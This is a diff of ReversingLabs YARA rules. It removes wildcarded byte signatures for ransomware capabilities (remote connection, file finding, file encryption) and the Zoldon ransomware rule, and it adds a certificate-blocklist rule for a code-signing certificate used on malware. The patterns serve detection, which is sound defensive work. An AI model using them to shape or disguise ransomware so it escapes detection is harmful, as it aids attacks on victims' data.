-            ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ??
-            ?? ?? ?? 83 C4 ?? C3 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24
-            C7 44 24 ?? ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ??
-            E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 D2 74 ?? 74 ?? 8B
-            4A ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8D 05
-            ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 D1
-        }
-		$remote_connection_p2 = {
-            EB ?? 89 4C 24 ?? 89 5C 24 ?? 84 03 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8D 43 ?? 89 44
-            24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54
-            24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 54 24 ?? 89 14 24 FF D1 8B
-            44 24 ?? 8B 4C 24 ?? 85 C0 74 ?? 74 ?? 8B 40 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 89 44 24 ?? 89 4C 24 ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ??
-            ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C
-            24 ?? 8B 5B ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 44 24 ?? 89 04 24 FF D3 90 E8
-            ?? ?? ?? ?? 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 89 04 24 8D 05 ?? ?? ?? ?? 89
-            44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-        }
-		$find_files_p1 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
-            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 8C 24 ?? ?? ?? ?? 89 4C 24 ?? E8 ?? ??
-            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 54
-            24 ?? 89 9C 24 ?? ?? ?? ?? 31 C0 31 C9 31 ED 31 F6 EB ?? 8B 7C 24 ?? 47 8B 9C 24 ??
-            ?? ?? ?? 89 CD 89 C6 89 F8 89 D1 8B 54 24 ?? 39 D0 0F 8D ?? ?? ?? ?? 89 44 24 ?? 89
-            4C 24 ?? 89 AC 24 ?? ?? ?? ?? 89 74 24 ?? 8D 0C C3 8B 11 89 94 24 ?? ?? ?? ?? 8B 49
-            ?? 89 8C 24 ?? ?? ?? ?? 8B 6A ?? 89 0C 24 FF D5 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ??
-            ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B 8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B
-            4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 85 C0 0F 86 ??
-            ?? ?? ?? 0F B6 11 80 FA ?? 75 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ??
-            ?? ?? ?? 80 FA ?? 74 ?? 89 44 24 ?? 89 8C 24 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 15
-            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ??
-            E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24
-            ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8B 11
-        }
-		$find_files_p2 = {
-            81 FA ?? ?? ?? ?? 75 ?? 0F B7 51 ?? 66 81 FA ?? ?? 75 ?? 0F B6 51 ?? 80 FA ?? 0F 84
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ??
-            ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89
-            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ??
-            8B 44 24 ?? 8D 48 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 E9 7F ?? 8B B4 24 ?? ??
-            ?? ?? 8D 7C C6 ?? 89 1F 8D 04 C6 8B 1D ?? ?? ?? ?? 85 DB 75 ?? 89 10 89 E8 89 CA 89
-            F1 E9 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89 4C 24 ?? 89 6C 24 ?? 89 04 24 89 54 24 ??
-            E8 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 8B B4 24 ?? ?? ?? ?? EB ?? 89 94 24 ?? ?? ??
-            ?? 89 5C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 89 44 24
-            ?? 89 6C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 74 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 8D 48
-            ?? 8B 44 24 ?? 8B 94 24 ?? ?? ?? ?? 8B 5C 24 ?? E9 ?? ?? ?? ?? 8D 54 24 ?? 89 14 24
-            8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ??
-            89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24
-            ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 8B 40 ?? 8B
-        }
-		$find_files_p3 = {
-            8C 24 ?? ?? ?? ?? 89 0C 24 FF D0 8B 44 24 ?? 8B 4C 24 ?? 89 0C 24 89 44 24 ?? E8 ??
-            ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 89 04 24 89 4C 24 ?? 8B 15
-            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 89 6C 24 ?? 89 5C 24 ?? 89 54 24 ??
-            E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B 44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24
-            ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44
-            24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24 ?? 89 4C 24 ?? C7 04 24 ?? ?? ?? ?? 8B 94 24 ??
-            ?? ?? ?? 89 54 24 ?? 8B 9C 24 ?? ?? ?? ?? 89 5C 24 ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? 89 74 24 ?? 8B 74 24 ?? 89 74 24 ?? E8 ?? ?? ??
-            ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 94 24 ?? ?? ?? ?? 89 14 24 8B
-            5C 24 ?? 89 5C 24 ?? 8B 2D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 6C 24
-            ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 83 C1 ?? 88
-            4C 24 ?? 0F B6 08 83 C1 ?? 88 4C 24 ?? 8D 0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ??
-            89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B
-            18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C 24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D
-        }
-		$find_files_p4 = {
-            6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ?? ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89
-            29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ??
-            E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89 48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ??
-            ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08 8B 6C 24 ?? 8B 4C 24 ?? 8B B4 24 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89
-            0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ?? ?? 89
-            2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8B
-            44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ??
-            89 04 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 74 ?? 8B
-            44 24 ?? 8B 8C 24 ?? ?? ?? ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0
-            0F 86 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 0F B6 08 88 4C 24 ?? 0F B6 08 88 4C 24 ?? 8D
-        }
-		$find_files_p5 = {
-            0D ?? ?? ?? ?? 89 0C 24 8B 15 ?? ?? ?? ?? 89 54 24 ?? 8D 54 24 ?? 89 54 24 ?? E8 ??
-            ?? ?? ?? 8B 44 24 ?? 8B 48 ?? 8D 51 ?? 8B 18 8B 40 ?? 39 C2 0F 8F ?? ?? ?? ?? 89 9C
-            24 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? 8D 6C CB ?? 8B 74 24 ?? 89 75 ?? 8B 2D ?? ??
-            ?? ?? 8D 0C CB 85 ED 75 ?? 8B 6C 24 ?? 89 29 8D 05 ?? ?? ?? ?? 89 04 24 8B 0D ?? ??
-            ?? ?? 89 4C 24 ?? 8D 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 89
-            48 ?? 8B 4C 24 ?? 89 48 ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 8B 8C 24 ?? ?? ?? ?? 89 08
-            E9 ?? ?? ?? ?? 89 04 24 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ??
-            ?? 89 0C 24 8B 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 89 4C 24 ?? 8D 2D ?? ?? ??
-            ?? 89 2C 24 89 5C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24
-            ?? 8B 44 24 ?? 8B 4C 24 ?? 8D 50 ?? 89 C8 8B 4C 24 ?? E9 ?? ?? ?? ?? 89 AC 24 ?? ??
-            ?? ?? 89 8C 24 ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 8C 24 ?? ?? ??
-            ?? 89 84 24 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 E8
-        }
-		$encrypt_files_p1 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 8D 44 24 ?? 3B 41 ?? 0F 86 ?? ?? ?? ?? 81 EC
-            ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? 8B 40 ?? 89 04 24 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 84
-            24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 15 ?? ?? ?? ?? 39 CA 0F 85 ?? ?? ?? ?? 8B 48
-            ?? 89 4C 24 ?? 8B 00 89 84 24 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? 89 4C 24
-            ?? 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 44
-            24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8D 54 24 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ??
-            89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8D AC 24 ?? ?? ?? ?? 89 6C 24 ?? 89 4C 24 ?? 89
-            44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 2D ?? ?? ?? ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F
-            85 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ??
-            85 D2 0F 85 ?? ?? ?? ?? 89 44 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 0D ?? ?? ??
-            ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 8B 44 24
-            ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 85 D2 0F 85 ?? ??
-            ?? ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 44 24 ?? E8
-        }
-		$encrypt_files_p2 = {
-            85 C0 0F 85 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 C7 44 24 ?? ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 54
-            24 ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C
-            24 ?? 85 C9 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
-            89 14 24 89 4C 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ??
-            8B 5C 24 ?? 85 C9 0F 85 ?? ?? ?? ?? 89 1C 24 89 54 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B
-            4C 24 ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ??
-            8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 8B 15 ?? ?? ?? ?? 8B 1D ?? ?? ??
-            ?? 8B 2D ?? ?? ?? ?? 89 54 24 ?? 89 5C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ??
-            89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8D 15 ?? ?? ?? ?? 89 14 24 C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 84 24 ?? ?? ?? ?? 8B 4C 24
-            ?? 89 4C 24 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 1C 24 8B 6C 24 ?? 89 6C 24 ??
-            8B 6C 24 ?? 89 6C 24 ?? 8B 6C 24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 31 C0 EB ?? 8B 4C 24 ?? 8B 54 24 ?? 8D 04 0A 89 44 24 ??
-            8B 4C 24 ?? 89 0C 24 8B 94 24 ?? ?? ?? ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 6C
-            24 ?? 89 6C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B
-            54 24 ?? 89 54 24 ?? 85 C9 74 ?? 8B 1D ?? ?? ?? ?? 39 D9 0F 85 ?? ?? ?? ?? 89 0C 24
-        }
-		$encrypt_files_p3 = {
-            89 54 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44 24 ?? 84 C0 0F 84
-            ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 89 04 24 8B 4C 24 ?? 89 4C 24 ?? 89 4C 24 ?? E8 ?? ??
-            ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 8B 54 24 ?? 8B 5C 24 ?? 8B 6C 24 ?? 39 EB 0F 87 ?? ??
-            ?? ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 74 24 ?? 8B 7E ?? 89 44 24 ?? 89 4C 24
-            ?? 89 54 24 ?? 8B B4 24 ?? ?? ?? ?? 89 74 24 ?? 89 5C 24 ?? 89 6C 24 ?? 8B 6C 24 ??
-            89 2C 24 FF D7 8B 44 24 ?? 8B 48 ?? 8B 54 24 ?? 89 54 24 ?? 8B 5C 24 ?? 89 5C 24 ??
-            8B 6C 24 ?? 89 6C 24 ?? 8B 74 24 ?? 89 34 24 FF D1 8B 44 24 ?? 89 04 24 8B 4C 24 ??
-            89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? 8B 4C 24 ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 4C 24 ?? 39 C1 0F 85 ?? ?? ?? ?? 89
-            0C 24 8B 44 24 ?? 89 44 24 ?? 8B 05 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? 0F B6 44
-            24 ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 8B 44 24 ?? 89 44 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24
-            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 44 24 ?? B9 ?? ?? ?? ?? F7 E9 8B 44 24 ?? 01 C2 C1 F8 ?? C1 FA ?? 29 C2 89 D0
-            89 D3 F7 E9 8D 04 13 C1 F8 ?? C1 FB ?? 29 D8 83 C0 ?? 89 44 24 ?? 31 C9 EB ?? 8B 54
-            24 ?? 8D 4A ?? 8B 44 24 ?? 39 C1 7D ?? 89 4C 24 ?? 8B 44 24 ?? 89 04 24 8D 0D ?? ??
-            ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 90
-            E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 90
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "20:50:b5:41:46:b0:11:ed:30:f6:0f:61" and 1476773926 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Zoldon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_73E2F34C9C2435F29Bbe0A3C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Zoldon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5d28e6f0-9d6b-54f4-81ed-aadb58352c80"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "284c206f-8a0c-5bb6-8f28-d8e5e60efe3e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Zoldon.yara#L1-L107"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13404-L13420"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4821b8506e7ba00987978f2744da1c532e03d73f3275cb15e39cdf87f6018223"
+		logic_hash = "503429e737e8bdad735cf88e2bb2877d1f52b2c38be101a7a129c02db608a347"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Zoldon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$main_encrypt_function_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ??
-            ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ??
-            8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
-            64 89 20 E8 ?? ?? ?? ?? DD 5D ?? 9B 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? FF 75 ?? FF
-            75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? B2 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B1 ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            3C ?? 0F 85 ?? ?? ?? ?? B0 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            84 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6
-            80 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 C7 45
-        }
-		$main_encrypt_function_p2 = {
-            8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 83 7D
-            ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 FF 45 ?? 66 83 7D
-            ?? ?? 75 ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 33 C9 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59
-            59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
-            E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$write_zoldon_regkey = {
-            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 88 4D ?? 8B DA 8B F0 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8D 45 ?? 8B D3 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D8 84 DB
-            75 ?? 8D 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 89 45 ?? 80 7D ??
-            ?? 74 ?? 83 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 46 ?? 50 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50
-            8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45 ?? EB
-            ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 8B 46 ?? 50 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 50 8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45
-            ?? 80 7D ?? ?? 74 ?? 83 7E ?? ?? 0F 95 C0 84 D8 74 ?? FF 76 ?? 68 ?? ?? ?? ?? FF 75
